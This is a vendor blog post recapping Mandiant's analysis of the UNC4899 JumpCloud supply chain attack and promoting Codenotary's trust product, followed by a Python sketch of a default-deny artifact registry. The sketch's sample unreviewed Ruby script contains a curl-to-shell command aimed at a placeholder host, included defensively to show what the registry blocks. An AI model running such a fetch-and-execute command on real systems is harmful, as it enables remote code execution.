Codenotary Trustcenter Blog

Decoding the UNC4899 Supply Chain Attack

Written by Mahrukh | Aug 15, 2023 10:57:19 AM

In July 2023, cybersecurity firm Mandiant Consulting sprang into action to investigate a significant supply chain compromise that had targeted a prominent US-based software solutions provider. The findings of this investigation shed light on a multifaceted attack executed by UNC4899, with alleged ties to North Korea's Reconnaissance General Bureau (RGB) and a history of cryptocurrency-focused operations.


In the tumultuous landscape of cybersecurity threats, this attack has underscored the urgency for comprehensive solutions that safeguard software integrity. Codenotary Trustcenter, with its SBOM and Trust capabilities, equips organizations with the power to preemptively identify unknown and unauthorized components in software. This pivotal solution not only mitigates risks but also ensures the trustworthiness of software, making it a must-have in an increasingly complex digital landscape.


Let's delve into the UNC4899 attack in an effort to understand the importance of data security in today’s world.

Supply Chain Attack Path

The breach was discovered to have originated in a meticulously orchestrated spear phishing campaign directed at JumpCloud, a well-known zero-trust directory platform service. It revealed the attacker's exploitation of vulnerabilities in JumpCloud's services to gain unauthorized access to downstream systems. Thankfully, the breach itself had limited scope, affecting only a handful of customers and devices.

Attribution to UNC4899 came through the thorough analysis of the attack's technical intricacies and the actor's operational behavior. This North Korean threat actor is believed to be a part of the RGB, specializing in cryptocurrency-focused operations. Remarkably, their approach closely resembles that of TraderTraitor, a financially motivated DPRK threat group known for its targeting of blockchain-related firms. The supply chain attack can be traced through its execution phases, each revealing the extent of UNC4899's capabilities:

Spear Phishing Targeting JumpCloud

The compromise commenced with a spear phishing campaign against JumpCloud. This highly precise attack aimed at exploiting vulnerabilities within JumpCloud's services, allowing unauthorized access and manipulation of downstream systems.

Malicious Ruby Script Execution

A malicious Ruby script was detected on June 27, 2023, initiated through the JumpCloud agent at a downstream customer's system. This script acted as a gateway for malicious data injections, enabling the attacker's foothold.

Identification of Compromise and Forensic Analysis

Mandiant's investigation revealed telltale signs of compromise within the JumpCloud agent log file. Moreover, the attacker's focus on specific macOS Ventura systems running particular versions illuminated their targeted approach.

Exploiting XProtect Behavioral Service

The attacker's utilization of Apple’s XProtect Behavioral Service was highlighted, showing their keen interest in leveraging this service to identify malicious binaries even after deletion or modification.

Backdoor Payloads and Malicious Script Analysis

The initial access was achieved by exploiting JumpCloud's commands framework, followed by the deployment of backdoor payloads, including FULLHOUSE.DOORED and STRATOFEAR, each with distinct functionalities.

Evolution of the TIEDYE Backdoor

Mandiant's analysis revealed the evolutionary nature of the TIEDYE backdoor through its identification of the Mach-O executable named xpc.protect. This backdoor demonstrated an array of capabilities, indicating the attacker's advanced techniques.

DPRK's Cryptocurrency Focus

UNC4899's interest in cryptocurrency became evident through their targeting of macOS keychains and their reconnaissance efforts towards executives and internal security teams, aligning with DPRK's broader interest in cryptocurrency operations.

Operational Security and Attribution

Mandiant also delved into the operational security practices of UNC4899, including their use of Operational Relay Boxes (ORBs) and VPN providers. These security measures, though at times flawed, unveiled valuable insights into the threat actor's true origins.

A Secure Future with Codenotary Trustcenter

This incident stands as a testament to the persistent cybersecurity challenges posed by threat actors with nation-state affiliations and highlights the need for robust supply chain security measures. As threats evolve, Codenotary Trustcenter defends software integrity and data security, empowering organizations to safeguard their digital realm with unwavering confidence. Codenotary's approach, in which unknown components are not trusted by default and a review is required to change their trust state, prevents the use of new and unreviewed artifacts.
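The default-deny trust policy described above, illustrated as an added example in Python; this is not Codenotary's product code, and the registry, state names, review record and sample script contents are all constructed for the illustration. Any artifact whose digest has never been reviewed stays unknown and is blocked, and changing even one byte of a trusted artifact returns it to the unknown state.

```python
"""Default-deny artifact trust registry (constructed illustration, not Codenotary code)."""
import hashlib
from enum import Enum


class TrustState(Enum):
    UNKNOWN = "unknown"      # never reviewed: not trusted by default
    TRUSTED = "trusted"      # explicitly approved by a reviewer
    UNTRUSTED = "untrusted"  # explicitly rejected by a reviewer


class TrustRegistry:
    """Maps artifact digests to a trust state; only a recorded review can change it."""

    def __init__(self):
        self._states = {}   # sha256 hex digest -> TrustState
        self._history = {}  # sha256 hex digest -> list of (reviewer, reason, state)

    @staticmethod
    def digest(content: bytes) -> str:
        return hashlib.sha256(content).hexdigest()

    def state_of(self, content: bytes) -> TrustState:
        # Anything not in the registry is UNKNOWN, never implicitly trusted.
        return self._states.get(self.digest(content), TrustState.UNKNOWN)

    def review(self, content: bytes, reviewer: str, reason: str, new_state: TrustState):
        # A review must be attributable, justified and reach an explicit decision.
        if new_state is TrustState.UNKNOWN:
            raise ValueError("a review must decide TRUSTED or UNTRUSTED")
        if not reviewer or not reason:
            raise ValueError("a review needs a reviewer and a reason")
        d = self.digest(content)
        self._states[d] = new_state
        self._history.setdefault(d, []).append((reviewer, reason, new_state))

    def allowed(self, content: bytes) -> bool:
        # The gate a deployment pipeline or agent would consult before running an artifact.
        return self.state_of(content) is TrustState.TRUSTED


def demo() -> dict:
    """Walk through the policy with two constructed scripts; returns the gate decisions."""
    reg = TrustRegistry()
    reviewed = b"#!/usr/bin/env ruby\nputs 'approved maintenance task'\n"
    unreviewed = b"#!/usr/bin/env ruby\nsystem('curl -s http://example.invalid/x | sh')\n"
    before = reg.allowed(reviewed)                       # blocked: never reviewed
    reg.review(reviewed, "alice", "matches signed release tag", TrustState.TRUSTED)
    return {"before_review": before, "after_review": reg.allowed(reviewed),
            "unreviewed": reg.allowed(unreviewed), "tampered": reg.allowed(reviewed + b"#")}
```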